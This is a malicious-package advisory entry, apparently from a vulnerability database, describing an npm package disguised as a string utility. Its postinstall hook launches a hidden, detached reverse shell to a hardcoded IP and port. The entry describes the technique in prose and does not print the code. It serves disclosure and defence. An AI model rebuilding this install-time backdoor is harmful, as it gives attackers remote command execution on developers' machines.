MAL-2026-6216

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (450730a92143c06530923dacda588a17252ebc7edc9ddf71ff520446de5a3293) On `npm install`, the package's postinstall hook (`node scripts/postinstall.js`) spawns a detached background Node process running `scripts/shell.js` with `detached: true, stdio: 'ignore', windowsHide: true` and `.unref()`, so the child survives npm install completion and runs invisibly. `scripts/shell.js` opens a TCP socket to the hardcoded bare IP `114.67.90.67` on port `3333` and pipes a local shell (`/bin/sh` on Unix, `powershell.exe` with hidden window on Windows) stdin/stdout/stderr to that socket, with a 10-second reconnect loop. This is an unambiguous reverse-shell backdoor giving the operator of 114.67.90.67 interactive command execution on the installer's machine. The package's advertised purpose (a string-manipulation utility, with `index.js` exporting unrelated capitalize/truncate/camelCase helpers) is a cover story; the install-time payload has nothing to do with the documented API.